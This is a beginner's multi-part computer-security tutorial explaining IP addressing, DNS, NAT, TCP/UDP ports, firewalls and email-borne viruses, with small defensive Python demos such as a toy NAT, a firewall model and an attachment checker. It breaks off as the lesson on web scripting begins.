In order to better secure your home computer or home network it helps if you have some basic knowledge of how it all works so you can understand what exactly you are securing and why. This will be the first in a 10-part series to help provide an overview of the terms and technology used and some of the tips, tricks, tools and techniques you can use to make sure your computer is secure.
To begin with, I want to provide some understanding of what these terms are so that when you read about the latest malicious code spreading through the Internet and how it gets into and infects your computer you will be able to decipher the techie terms and determine if this affects you or your computer and what steps you can or should take to prevent it. For Part 1 of this series we will cover Hosts, DNS, ISP’s and Backbone.
The term “host” can be confusing because it has multiple meanings in the computer world. It is used to describe a computer or server that serves up web pages; in this context the computer is said to be “hosting” the web site. Host is also used to describe the companies that rent out space on their server hardware and Internet connection as a service, so that not every company or individual has to buy and run all their own equipment.
A “host” in the context of computers on the Internet is defined as any computer that has a live connection with the Internet. All computers on the Internet are peers to one another. They can all act as servers or as clients. You can run a web site on your computer just as easily as you can use your computer to view web sites from other computers. The Internet is nothing more than a global network of hosts communicating back and forth. Looked at in this way, all computers, or hosts, on the Internet are equal.
Each host has a unique address, similar to the way street addressing works. It would not work to simply address a letter to Joe Smith. You have to also provide the street address- for example 1234 Main Street. However, there may be more than one 1234 Main Street in the world, so you must also provide the city- Anytown. Maybe there is a Joe Smith on 1234 Main Street in Anytown in more than one state- so you have to add that to the address as well. In this way, the postal system can work backward to get the mail to the right destination. First they get it to the right state, then to the right city, then to the right delivery person for 1234 Main Street and finally to Joe Smith.
On the Internet, this is called your IP (Internet Protocol) address. An IPv4 address is 32 bits long and is written as four numbers, each between 0 and 255, separated by dots- for example 192.0.2.10. Different ranges (blocks) of IP addresses are assigned to different companies or ISP’s (Internet service providers). The routers on the Internet forward a packet by reading the address from left to right, much like the postal system reads state, then city, then street: first it goes to the network that owns that range of addresses, and that network then passes it down to the specific host it is intended for. The more of the address a block shares, the more specific the block is.
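To make the “funnelling” concrete, here is a small Python program, added for this lesson (it is not code from the original article), that takes a dotted-decimal address apart, packs it into the single 32-bit number routers actually compare, and finds the most specific block that contains it. The blocks and owner names in the table are made up; 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 are ranges reserved for documentation and never appear on the real Internet.

```python
"""IPv4 addressing and longest-prefix matching.

Added example for this lesson, not code from the original article.
Every network block and owner name below is made up for illustration
(192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24 are reserved for
documentation and never appear on the real Internet)."""
import ipaddress

# Constructed ownership table: address block -> who it is assigned to.
# A longer prefix (/25) is a more specific block inside a shorter one (/24),
# just as a street is more specific than a city in the postal analogy.
OWNERSHIP = {
    "192.0.2.0/24": "Example ISP (whole block)",
    "192.0.2.128/25": "Example ISP, customer segment",
    "198.51.100.0/24": "Example Hosting Co.",
    "203.0.113.0/24": "Example Backbone Provider",
}


def parse_octets(text):
    """Split dotted-decimal text into four integers, each 0-255.

    Raises ValueError for anything that is not a valid IPv4 address."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four octets, got {text!r}")
    octets = []
    for part in parts:
        if not part.isdigit():
            raise ValueError(f"octet is not a number: {part!r}")
        value = int(part)
        if value > 255:
            raise ValueError(f"octet out of range 0-255: {part!r}")
        octets.append(value)
    return octets


def to_int(text):
    """Pack the four octets into the single 32-bit number routers compare."""
    a, b, c, d = parse_octets(text)
    return (a << 24) | (b << 16) | (c << 8) | d


def longest_prefix_match(text, table=OWNERSHIP):
    """Return (block, owner) for the most specific block containing the
    address, or None if no block in the table covers it."""
    addr = ipaddress.IPv4Address(to_int(text))  # parse_octets validates first
    best_net, best_owner = None, None
    for block, owner in table.items():
        net = ipaddress.ip_network(block)
        if addr in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_owner = net, owner
    if best_net is None:
        return None
    return str(best_net), best_owner


if __name__ == "__main__":
    for ip in ("192.0.2.10", "192.0.2.200", "198.51.100.7", "10.1.2.3"):
        print(ip, "->", longest_prefix_match(ip))
```

Run it and 192.0.2.200 lands in the /25 customer segment rather than the enclosing /24, which is exactly the “state, then city, then street” narrowing described above; 10.1.2.3 matches nothing because no block in the table covers it.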
I might name my computer “My Computer”, but there is no way for me to know how many other people named their computer “My Computer”, so sending communications to “My Computer” would work no better than addressing a letter simply to “Joe Smith”. On the other hand, with millions of hosts on the Internet it is virtually impossible for users to remember the numeric address of every web site or host they want to communicate with, so a system was created to let users reach sites using names that are easier to recall.
The Internet uses DNS (Domain Name System) to translate a name to its IP address so the communications can be routed properly. For instance, you may simply enter “yahoo.com” into your web browser. Your computer sends that name to a DNS server, which looks it up (or asks other DNS servers on your behalf) and returns an address- something like 192.0.2.10, to use a made-up example from the range reserved for documentation- which the computers can use to get the communication to its intended destination.
DNS servers are scattered all over the Internet rather than relying on a single, central database. This protects the Internet by not creating a single point of failure that could take everything down. It also speeds up name lookups: the workload is divided among many servers placed around the globe, and the server near you remembers (caches) the answers it has recently looked up so it does not have to ask again. In this way your name is usually translated at a DNS server close to you that serves a few thousand hosts, rather than by a central server halfway around the planet that millions of people are trying to use at once.
Your ISP (Internet Service Provider) most likely has their own DNS servers. Depending on the size of the ISP they may have more than one DNS server and they may be scattered around the globe as well for the same reasons cited above. An ISP has the equipment and owns or leases the telecommunications lines necessary to establish a presence on the Internet. In turn, they offer access through their equipment and telecommunication lines to users for a fee.
The largest ISP’s own the major conduits of the Internet referred to as the “backbone”. Picture it the way a spinal cord goes through your backbone and acts as the central pipeline for communications on your nervous system. Your nervous system branches off into smaller paths until it gets to the individual nerve endings similar to the way Internet communications branch from the backbone to the smaller ISP’s and finally down to your individual host on the network.
If something happens to one of the companies that provide the telecommunications lines that make up the backbone it can affect huge portions of the Internet because a great many smaller ISP’s that utilize that portion of the backbone will be affected as well.
This introduction should give you a better understanding of how the Internet is structured, with the backbone providers supplying communications access to the ISP’s, who in turn supply that access to individual users such as yourself. It should also have helped you understand how your computer relates to the millions of other “hosts” on the Internet and how DNS is used to translate “plain-English” names to addresses that can be routed to their proper destinations. In the next installment we will cover TCP/IP, DHCP, NAT and other fun Internet acronyms.
In Computer Security 101 ™– Lesson 1 we discussed Hosts, DNS, ISP’s and Backbone. This is the second in a series designed to provide you with a basic understanding of the technology and terminology used on the Internet. Knowing why things work the way they do and what they are called will help you to secure your computer or network against new threats. In this lesson we will cover protocols, TCP/IP, DHCP and NAT.
Communications on the Internet and between computers is governed by protocols. The Merriam-Webster Dictionary defines a protocol as “a set of conventions governing the treatment and especially the formatting of data in an electronic communications system.” I’m not sure that makes things much clearer to a lay-person.
Put simply, if you called an orange an apple and I called it a plum we would never be able to communicate. At some point we have to come to some agreement as to what to call it. For computers and the Internet there were many organizations coming up with their own proprietary way of formatting and transmitting data. In order to ensure that all computers would be able to talk to each other and not just to their “own kind” protocols were created and agreed to.
TCP/IP, which stands for Transmission Control Protocol / Internet Protocol, is not a single protocol. It is a set (a “suite”) of communication standards, of which TCP and IP are the two main protocols. TCP/IP has been accepted as the standard for Internet communications and comes packaged by default with all major operating systems.
In order to communicate using TCP/IP each Host must have a unique IP address. As we discussed in Lesson 1, your IP address is similar to your street address. It identifies your Host on the Internet network so that communications intended for you reach their destination.
Originally, IP addresses were manually coded to each computer. As the Internet exploded and millions of Hosts were added it became an overwhelming task to track which IP addresses were already in use or which ones were freed up when a computer was removed from the network.
DHCP, or Dynamic Host Configuration Protocol, was created to automate this process. A DHCP server is given a block of addresses that it controls. Hosts that are configured to use DHCP broadcast a request when they start up; the DHCP server checks its database of addresses, finds one that is not in use and leases it to the Host for a set period of time. The Host renews the lease while it stays on the network. When it is turned off or removed (or the lease simply runs out without being renewed) the address goes back into the pool and the DHCP server can hand it to a new Host. A Host may therefore get a different address each time it connects, which is why you cannot count on a home computer keeping the same IP address.
The exponential growth of the Internet caused a shortage in the available IP addresses similar to the way the growth of cell phones, pagers and the like have caused a shortage of phone numbers. Unlike the phone system though, the Internet could not simply add a new prefix to the mix to create new phone numbers. While the next version of the IP protocol (IPv6) is designed to allow for an exponential increase in the number of available addresses, the current version (IPv4) was running dry fast.
In the meantime, NAT (Network Address Translation) can be used to stretch the supply of public addresses. A NAT router uses one public IP address (or a few) to communicate on the Internet and a completely separate block of addresses on the local network, normally drawn from the ranges set aside for private use: 10.0.0.0/8 (10.x.x.x), 172.16.0.0/12 (172.16.x.x through 172.31.x.x) and 192.168.0.0/16 (192.168.x.x). As each connection leaves the local network the router rewrites the source address to its public address and remembers which internal Host the connection belongs to, so the replies can be translated back. The local network addresses need to be unique from each other, but since the outside world never sees them they don’t need to be unique to the world; the same 192.168.1.10 can exist behind millions of different routers.
Without NAT a company with 100 computers that wanted all 100 to connect with the Internet would need to have 100 separate public IP addresses. That same company using NAT would only need 1 public IP address and would assign the computers on the local network internal IP addresses.
This “hiding” of the internal IP addresses works not only to allow more Hosts to share the Internet, but also as a layer of security. A computer on the Internet cannot open a connection to 192.168.1.10 behind your router: that address is not routable on the Internet, and the router has no translation entry for a connection nobody inside started, so the unsolicited packet is simply dropped. Be clear about what that does and does not give you. NAT stops outside Hosts from initiating connections to your machines, which takes away a key piece of information hackers could use to break in, but it does nothing about what your own machines send out or bring back in, and it is not a substitute for a firewall.
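The following toy NAT router, written for this lesson (it is not code from the original article and not how any real router is implemented), shows the translation table at work: an outbound connection gets an entry, the reply is matched against that entry and delivered to the right internal Host, and an unsolicited probe from outside finds no entry and is dropped. The public address 203.0.113.5, the remote servers in 198.51.100.0/24, the home network 192.168.1.0/24 and all port numbers are made-up values; 203.0.113.0/24 and 198.51.100.0/24 are reserved for documentation.

```python
"""A toy NAT router (port address translation) with a translation table.

Added example for this lesson; not code from the original article and not a
model of any particular router product. The public address 203.0.113.5, the
remote servers in 198.51.100.0/24 and the port numbers are all made up
(those ranges are reserved for documentation)."""
import ipaddress
from dataclasses import dataclass

# The three blocks RFC 1918 sets aside for private networks.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

PUBLIC_IP = "203.0.113.5"                         # assumed: the router's one public address
LAN_NET = ipaddress.ip_network("192.168.1.0/24")  # assumed: the home network behind it


def is_rfc1918(text):
    """True if the address belongs to one of the private ranges."""
    addr = ipaddress.ip_address(text)
    return any(addr in net for net in RFC1918)


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class NatRouter:
    def __init__(self, public_ip=PUBLIC_IP, first_port=40000):
        self.public_ip = public_ip
        self.next_port = first_port
        # (lan_ip, lan_port, remote_ip, remote_port) -> public port, and the reverse.
        self.out_table = {}
        self.in_table = {}

    def send_out(self, pkt):
        """A LAN host sends to the Internet: rewrite the source to our public
        address and a fresh public port, remembering who it belongs to."""
        if ipaddress.ip_address(pkt.src_ip) not in LAN_NET:
            raise ValueError("packet did not come from the LAN")
        key = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        public_port = self.out_table.get(key)
        if public_port is None:
            public_port = self.next_port
            self.next_port += 1
            self.out_table[key] = public_port
            self.in_table[public_port] = key
        return Packet(self.public_ip, public_port, pkt.dst_ip, pkt.dst_port)

    def receive_in(self, pkt):
        """A packet arrives from the Internet. Return it rewritten for the LAN
        host it belongs to, or None if the router drops it."""
        if pkt.dst_ip != self.public_ip:
            return None
        key = self.in_table.get(pkt.dst_port)
        if key is None:
            return None            # unsolicited: nobody inside asked for this
        lan_ip, lan_port, remote_ip, remote_port = key
        if (pkt.src_ip, pkt.src_port) != (remote_ip, remote_port):
            return None            # right port, wrong peer (this toy is a "symmetric" NAT)
        return Packet(pkt.src_ip, pkt.src_port, lan_ip, lan_port)


def demo():
    """One outbound connection, its reply, and an unsolicited probe from outside."""
    nat = NatRouter()
    outbound = nat.send_out(Packet("192.168.1.10", 51000, "198.51.100.7", 80))
    reply = nat.receive_in(Packet("198.51.100.7", 80, PUBLIC_IP, outbound.src_port))
    probe = nat.receive_in(Packet("198.51.100.99", 4444, PUBLIC_IP, 80))
    return outbound, reply, probe


if __name__ == "__main__":
    out, back, dropped = demo()
    print("on the wire:", out)
    print("reply delivered to:", back)
    print("unsolicited probe delivered to:", dropped)
```

Notice that the probe is dropped not because the attacker does not know the internal address but because no inside Host created a mapping for it; that is the whole of the “security” NAT provides, and it evaporates the moment something inside opens the connection itself.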
Now that we have talked about how protocols help standardize communications so that different computers can talk to each other and how TCP/IP is the collection of protocols used to communicate on the Internet we can start to look at how these things can be exploited and used against you. We also discussed how DHCP dynamically assigns IP addresses to Hosts and how NAT can be used to increase the number of Hosts that can connect to the Internet through one IP address while also hiding your internal network from the world. The next lesson will cover TCP, UDP, Ports and Firewalls.
Welcome back! This is our third lesson in Computer Security 101 ™, a series of simple lessons to provide you with a basic overview of the terminology and technology used everyday on the Internet. My hope is that if you understand the acronyms and how things work you will be better able to understand when there is a threat and how to protect your system against that threat.
In Lesson 2 we discussed Protocols, TCP/IP, DHCP and NAT. This lesson will build on the TCP/IP protocol by discussing Ports, TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) and then wrap up with a simple discussion of firewalls.
To start off, ports are like channels for communications. When you sit down to watch TV you have to tune your TV to a specific frequency in order to view the Weather Channel. If you want the Disney Channel you need to change to a different frequency. To view CNN you would need to set your TV to yet another frequency.
Similarly, when surfing the Internet there is a certain port that is used when your computer wants to receive HTTP (Hypertext Transfer Protocol used for viewing HTML or web pages) traffic. To download files you might use FTP (File Transfer Protocol) which would be received on a different port. SMTP (Simple Mail Transfer Protocol used for transmitting email messages) communications would be received on a different port.
There are 65,536 port numbers (0 through 65535) available for use in TCP and, separately, in UDP. They are divided into three ranges. The Internet Assigned Numbers Authority (IANA) keeps the registry, and the first 1024 (0 – 1023) are known as the Well Known Port Numbers. This range includes the standard default ports for common services such as HTTP (TCP port 80), FTP (TCP port 21) and SMTP (TCP port 25). These port numbers are reserved for those services and should not be used arbitrarily; on Unix-like systems a program must run with root privileges to listen on one.
The second range is the Registered Port Numbers, ports 1024 through 49151. Vendors and projects register port numbers in this range with IANA for their own services, but registration is only a convention, not enforcement: any program can listen on any port it likes, and the fact that traffic uses port 80 does not guarantee it is web traffic.
The third range is the Dynamic or Private Port Numbers, 49152 through 65535. Your own computer uses this range all the time without your noticing. When it opens a connection to a server the operating system picks a temporary (“ephemeral”) source port so the replies can be matched to the right program, and this is where that port normally comes from (some older systems draw ephemeral ports from 1024 upward instead). There are known Trojan horse and backdoor programs that listen on ports in this extreme upper range, so some security administrators are leery of inbound connections to it.
TCP is one of the two protocols that use port numbers. TCP allows two hosts on the Internet to establish a connection with each other through a three-step “handshake”. One host initiates by sending a request (a packet with the SYN flag set) to the other. That host responds agreeing to establish the connection (SYN and ACK flags set). Finally, the originating host responds once more to acknowledge receipt of the acceptance (ACK flag set) and the connection is established.
When data is fed to TCP, TCP breaks it into smaller, more manageable pieces called segments, each of which is carried across the network inside an IP packet. Each segment gets a TCP header specifying the source port, the destination port, a sequence number and other key identifying information; the IP header wrapped around it carries the originating and destination IP addresses.
When the packets leave to traverse the Internet and get to their destination they may not all take the same path. There are thousands of routers, and complex algorithms decide from moment to moment which path is going to be the best one for the next packet. This means the packets may not arrive at their destination in the same order they were sent out. It is the responsibility of TCP on the receiving end to look at the sequence numbers in the headers and put the segments back in order.
If a segment goes missing the receiver never acknowledges it, and the sender, seeing no acknowledgement within a reasonable time, resends the data. TCP also does flow control, with the two hosts telling each other to speed up or slow down the rate of sending depending on network congestion and how fast the receiving computer can process the incoming data.
UDP is the other protocol that works with IP and uses port numbers. Unlike TCP, UDP does not establish a connection and does not provide any sort of error recovery or flow control: each message (a “datagram”) is sent on its own, and the sending host gets no acknowledgement that it was received. It is the protocol of choice where a quick one-shot exchange or a steady stream matters more than guaranteed delivery, and it is also what broadcast messages on a local network use.
Because UDP does not take the time to set up a connection between the two hosts, perform flow control to monitor network congestion or do the sort of error-checking and receipt acknowledgement that TCP does, it has much less overhead in terms of time and resources. Some services that benefit from this are DNS, SNMP and streaming multimedia (for example watching a video clip over the Internet).
Now that we have covered TCP, UDP and ports we can move on to discussing firewalls. A basic firewall is designed to block or control what traffic is allowed into or out of your computer or network. One way to do this is to simply block all incoming TCP and UDP traffic on all ports. For many home users this will work just fine. The firewall will still allow a response using the TCP or UDP ports through as long as the connection was initiated by your computer, but blocking in this manner will make sure no external computers can initiate a session with your computer.
If you do want to host a web site, allow files to be downloaded from your computer using FTP or let other computers connect to yours for online gaming, you would need to open the respective port. For example, to host a web server you would configure your firewall to block all incoming UDP and TCP traffic on all ports except TCP port 80. On most basic home Cable / DSL routers the port-blocking firewall can be configured to pass traffic on a port through to one specific host, so that your other computers would still be protected from this sort of traffic but external hosts would be able to reach your web server, game connection or whatever else you wanted.
This sort of basic firewall has some issues that hackers and malicious programmers can exploit to sneak through, which is why there are more advanced firewall systems. I mentioned that with this sort of port blocking, communications in response to connections initiated by your computer would be allowed through even on ports you were blocking. A simple packet filter has no memory of what your computer has done; it decides what counts as a “response” by looking only at the packet in front of it, typically whether the TCP ACK flag is set. Using this knowledge, a hacker can forge a packet with that flag set so it looks like a reply rather than the start of a connection, and the simple filter will let it through.
Even on connections that ARE initiated by your computer, a malicious programmer can still exploit weaknesses in the system to sneak packets through. To guard against some of these weaknesses there are other types of firewalls- stateful inspection packet filters, which keep a table of the connections your computer has actually opened and only admit packets that belong to one of them, circuit level gateways and application level gateways, to name a few. For more details on firewalls see the article “What Is A Firewall?”.
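This Python model, added for this lesson (not code from the original article or from any firewall product), puts the TCP handshake and the two kinds of firewall side by side: a stateless filter that treats any packet with ACK set as a reply, and a stateful one that keeps a connection table. The home PC address 192.168.1.10, the outside hosts in 198.51.100.0/24 and the port numbers are made up; 198.51.100.0/24 is reserved for documentation.

```python
"""TCP three-way handshake, a stateless packet filter and a stateful one.

Added example for this lesson, not code from the original article or from
any firewall product. Addresses (192.168.1.10 for the home PC, hosts in
198.51.100.0/24 outside) and port numbers are made up."""
from dataclasses import dataclass

SYN = 0x02   # TCP flag bits as laid out in the TCP header
ACK = 0x10

HOME_PC = "192.168.1.10"   # assumed address of the protected computer


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    flags: int


def stateless_allows_inbound(seg, open_ports=()):
    """The simple port-blocking filter from the lesson. It has no memory, so it
    judges "is this a reply?" from the packet alone: ACK set means reply."""
    if seg.dport in open_ports:
        return True
    return bool(seg.flags & ACK)


class StatefulFirewall:
    """Remembers every connection the home PC opens and admits only packets that
    belong to one of them, or genuine new connections to deliberately opened ports."""

    def __init__(self, open_ports=()):
        self.open_ports = set(open_ports)
        self.table = {}  # (inside_ip, inside_port, outside_ip, outside_port) -> state

    def outbound(self, seg):
        """Outbound traffic is allowed (this firewall, like the lesson's, does not
        police egress) but the handshake steps are recorded."""
        key = (seg.src, seg.sport, seg.dst, seg.dport)
        state = self.table.get(key)
        if (seg.flags & SYN) and not (seg.flags & ACK):
            self.table[key] = "SYN_SENT"         # handshake step 1 leaving
        elif state == "SYN_ACK_SEEN" and (seg.flags & ACK):
            self.table[key] = "ESTABLISHED"      # handshake step 3 leaving
        return True

    def inbound(self, seg):
        key = (seg.dst, seg.dport, seg.src, seg.sport)
        state = self.table.get(key)
        if state is None:
            # Only a real new connection (pure SYN) to a port we chose to open.
            if seg.dport in self.open_ports and (seg.flags & SYN) and not (seg.flags & ACK):
                self.table[key] = "ESTABLISHED"  # simplified: server-side handshake not tracked
                return True
            return False                         # covers forged "replies": no entry, no entry
        if state == "SYN_SENT":
            if (seg.flags & (SYN | ACK)) == (SYN | ACK):
                self.table[key] = "SYN_ACK_SEEN"  # handshake step 2 arriving
                return True
            return False
        return True                              # belongs to a known connection


def demo():
    """Walk a handshake through the stateful firewall, then try a forged reply
    against both firewalls and new SYNs against an opened and a closed port."""
    fw = StatefulFirewall(open_ports=(80,))
    server, attacker = "198.51.100.7", "198.51.100.99"
    steps = [
        fw.outbound(Segment(HOME_PC, 51000, server, 80, SYN)),
        fw.inbound(Segment(server, 80, HOME_PC, 51000, SYN | ACK)),
        fw.outbound(Segment(HOME_PC, 51000, server, 80, ACK)),
    ]
    handshake_ok = all(steps) and fw.table[(HOME_PC, 51000, server, 80)] == "ESTABLISHED"
    # Attacker forges a packet with ACK set, aimed at an arbitrary high port.
    forged = Segment(attacker, 4444, HOME_PC, 51001, ACK)
    return {
        "handshake_ok": handshake_ok,
        "forged_reply_stateless": stateless_allows_inbound(forged),   # looks like a reply
        "forged_reply_stateful": fw.inbound(forged),                  # no such connection
        "new_syn_to_port_80": fw.inbound(Segment(attacker, 5555, HOME_PC, 80, SYN)),
        "new_syn_to_port_23": fw.inbound(Segment(attacker, 5556, HOME_PC, 23, SYN)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {'allowed' if verdict else 'dropped'}")
```

The forged ACK packet sails through the stateless filter and is dropped by the stateful one for a single reason: the stateful firewall looked for a matching entry in its table and found none. The same table is what lets a legitimate SYN/ACK from the web server in during the handshake.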
Another consideration for firewalls is that it is not always enough to monitor or block inbound traffic. You may get a virus or Trojan horse program through a connection you initiated, thereby bypassing the firewall, or through email. These malicious programs can open ports and initiate connections FROM your computer once they are planted there. Most software based firewalls like Zone Alarm or Sygate (Top Software Firewall Products) or more advanced hardware based firewalls will monitor outbound connections as well.
That does it for Lesson 3. We have completed an overview of ports and some of the common uses, the TCP and UDP protocols and a quick look at how firewalls work. In Lesson 4 we will cover email security, email borne viruses, hidden file extensions and email spoofing. Come back soon.
The Computer Security 101 series is a 10-part series of articles intended to provide the security novice with a basic understanding of the terminology, acronyms and technology involved. The hope is that if you understand how and why things work in the first place you will be able to protect and secure those things better.
In our third lesson of Computer Security 101 we covered Ports, TCP, UDP and firewalls. This lesson we will discuss various security issues associated with using email including email borne viruses, hidden file extensions and email spoofing.
One of the main attack vectors for a virus is through your email. While it is possible to get a virus by using an infected floppy disk or compact disc one of the main methods of propagation is through email. From the standpoint of trying to do the most damage it makes sense for a virus author to use email as a means for spreading the virus.
The authors of Trojans, worms and viruses are sometimes exceptionally clever and ingenious in finding and exploiting weaknesses in both the computer system and in human nature in order to make their attack successful. Unfortunately, sometimes even viruses that aren’t so clever manage to spread quickly and do lots of damage due to uneducated and naïve users.
To get you to open the email in the first place viruses try to use Subject Lines for the email messages that will get your attention. Some will come disguised as important alerts from major companies like Microsoft. Recent viruses will also reply to existing emails in the infected computer. When you receive a message in response to a message you know you sent someone you have no reason to suspect it would be harmful so you are more likely to open it.
Typically, the email itself is not the problem. The Subject Line and the Message Body are worded with the intent of getting you to double-click the attached file to execute the actual virus. With HTML-based email, though, it became possible for the message to run the attachment for you: a flaw in the way Internet Explorer (and with it Outlook and Outlook Express) handled MIME headers let an attachment execute as soon as the message was opened or previewed, without waiting for you to click anything. Worms such as Nimda used this flaw to spread by email. In 2001 Microsoft released Security Bulletin MS01-020, including a patch to protect users from this happening.
As users became educated (although it can be debated what percentage of the users are really educated) about clicking on file attachments the malicious code writers had to change their strategy. It became known that executable files like EXE (Executable), COM (Command), BAT (Batch) and other file types like these would run a program once they were clicked on and that you should not open those types of attachments if you didn’t know who they were from and why.
Being quite clever, the virus writers figured out that they could hide the true file extension to trick the user. By default, Windows Explorer hides the extensions of known file types, so an attachment named readme.txt.exe shows up simply as readme.txt. Even if a user turns off “Hide file extensions for known file types”, there are some extensions that still will not show up.
In the Registry, a file type can carry a value named “NeverShowExt”, which keeps extensions like LNK (Windows shortcut links) and SHS (Shell Scrap Objects) from being displayed even when the user has chosen to show all extensions. A file named photo.jpg.shs therefore appears as photo.jpg no matter how Explorer is configured, yet opening it runs whatever the scrap object contains.
By using double or hidden file extensions more malicious viruses were able to wreak havoc on end users’ computers through email. After learning that not all file attachments could be trusted, and then being further duped into executing malicious files anyway through hidden file extensions, users learned not to open attachments in emails that weren’t from someone they knew and trusted.
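The following Python script, added for this lesson (it is not code from the original article or from any mail or antivirus product), does the check a cautious mail filter would do: it parses a raw email, pulls out the attachment names, and flags executable types, double extensions and the NeverShowExt types that Windows hides even when you ask it not to. The sample message is constructed in the script, and the list of “known” file types stands in for the real registry on a given machine.

```python
"""Spotting dangerous or disguised email attachments.

Added example for this lesson, not code from the original article or from
any mail product. The sample message is constructed below; the set of
"known" extensions Windows would hide is an assumption standing in for the
real registry of file types on a given machine."""
import email
from email import policy
from email.message import EmailMessage

# File types that run a program when double-clicked (the lesson's EXE, COM,
# BAT and VBS plus a few others of the same kind).
EXECUTABLE = {"exe", "com", "bat", "cmd", "pif", "scr", "vbs", "js", "lnk", "shs"}
# Types Windows refuses to show even when "hide extensions" is off (NeverShowExt).
NEVER_SHOW = {"lnk", "shs"}
# Assumed set of registered ("known") file types on the user's machine.
KNOWN = EXECUTABLE | {"txt", "doc", "xls", "jpg", "gif", "htm", "html", "zip"}


def displayed_name(filename, hide_known=True):
    """What Windows Explorer would show for this file name."""
    base, dot, ext = filename.rpartition(".")
    if not dot:
        return filename
    ext = ext.lower()
    if ext in NEVER_SHOW or (hide_known and ext in KNOWN):
        return base
    return filename


def classify(filename):
    """Return the reasons this attachment name deserves suspicion ([] if none)."""
    reasons = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE:
        reasons.append(f"runs a program when opened (.{ext})")
    if len(parts) > 2 and parts[-2] in KNOWN and parts[-2] not in EXECUTABLE:
        reasons.append(f"double extension: looks like a .{parts[-2]} file")
    if ext in NEVER_SHOW:
        reasons.append("extension is hidden even when extensions are shown")
    shown = displayed_name(filename)
    if reasons and shown != filename:
        reasons.append(f"Explorer would display it as {shown!r}")
    return reasons


def scan_message(raw_bytes):
    """Parse a raw message and report the suspicious attachments by name."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed attachment)"
        reasons = classify(name)
        if reasons:
            findings[name] = reasons
    return findings


def build_sample():
    """Constructed sample: a 'reply' carrying three attachments, two disguised."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "Re: the file you asked for"
    msg.set_content("Here it is, let me know what you think.")
    msg.add_attachment(b"MZ\x90\x00fake", maintype="application",
                       subtype="octet-stream", filename="report.doc.exe")
    msg.add_attachment(b"\xff\xd8\xff\xe0fake", maintype="image",
                       subtype="jpeg", filename="photo.jpg")
    msg.add_attachment(b"fake scrap", maintype="application",
                       subtype="octet-stream", filename="notes.txt.shs")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in scan_message(build_sample()).items():
        print(name)
        for reason in reasons:
            print("   -", reason)
```

The two disguised attachments are caught by the file name alone, before anything is opened; photo.jpg is left alone. Note that notes.txt.shs is reported as displayed “notes.txt” even when hide_known is False, which is exactly the NeverShowExt behaviour described above.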
Malicious code writers quickly got around that by creating viruses that propagate from people the end user already knows. The virus reads all of the addresses in the infected user’s address book and sends itself to every one of them, so each copy appears to come from someone the recipient knows.
One problem with this method when it comes to wanting your virus to spread as far and as fast as possible is that the user who receives an infected email from a friend can simply call that friend and let them know they are transmitting a virus. Then that user will disconnect their computer from the Internet, clean the virus up and there will be one less computer to propagate the threat.
Email spoofing is used by virus writers to get around this little problem. The virus will still scan various files on the infected computer to look for addresses to send to- email address books, the Windows address book, email in the users inbox, or sent mail box, and even HTML pages cached on the computer. But, rather than sending the email “from” the infected user, the virus will also randomly select an email address to forge as the “from” address.
When the email is sent the recipient may detect that it is infected and contact the user that allegedly sent it, only to find out that the email did not really come from them. On a simple level, anyone can configure their email program so that the name and email address on the account belong to someone else; messages then show up with that name and replies go to that address. Because the email protocol (SMTP) never checks that the From address belongs to whoever actually sent the message, this information is trivially faked and can’t be relied upon.
The bottom line with email is to be careful. Always run antivirus software and ensure that it is kept up to date with the latest virus files from the software vendor. Equally, or more important, keep your system patched against known vulnerabilities. The major virus and worm threats of the past couple years have exploited vulnerabilities for which patches were available for months. If all users would have patched when the patch became available the virus or worm would have been powerless.
Think twice about executing file attachments to email- consider the source and the message body and the file attachment type and if you are at all suspicious contact the alleged sender to verify the reason for the attachment before opening it. Watch out for broken English and message bodies that don’t make any sense. Also beware of claims that Microsoft is sending you a patch or that Intel is writing to let you know about the next great virus. Microsoft sends out bulletins, but never emails the actual patch as an attachment and Intel isn’t in the business of detecting or alerting users about viruses. Clues like these should tell you that the message is either a hoax or it’s a virus and in either event you should simply delete it and go about your day.
With this lesson we reach the half-way point of our 10-part series: Computer Security 101. The series provides a simple overview of the technology, terminology and acronyms used everyday regarding computer systems and the Internet. The goal of the series is that by having an understanding of what the technology is called and what it does you will be able to understand when there is a threat that affects you and take the appropriate steps to secure your computer system.
About 10 “people years” ago (or about 60 years in “web years”, according to the FAQ on Tim Berners-Lee’s web site) the World Wide Web was text-based. In 1989 Tim Berners-Lee began creating a global hypertext project. By the summer of 1991 the World Wide Web was born and released to the Internet at large.
The Hypertext Markup Language (HTML) used to create the web pages continued to be refined. Starting in late 1992, Marc Andreessen and the NCSA team created Mosaic (first for X Windows, hence “X Mosaic”), released in 1993. Mosaic introduced the “img” tag, which allowed graphics to be inserted into the web pages as well. This brought on the explosive growth and popularity of the World Wide Web; however, the pages were still static- meaning they only showed whatever they were written to show in the first place.
In order to provide more functionality- whether for business or entertainment- companies needed to find a way to make the pages dynamic. They wanted to be able to present new information or update the information on the screen automatically. Active scripting was created to fulfill this need.
The concept and functionality of scripting languages has grown since they were first introduced. The goal has always been to find more and better ways to dynamically update the web page with information that is new or unique to the user. To do this the scripting languages had to be able to pull information from the client computer or from databases housed on the server. The scripts are small programs embedded in, or referenced from, the HTML; some run in your browser on your own computer (client-side), others run on the web server before the page is sent to you (server-side).
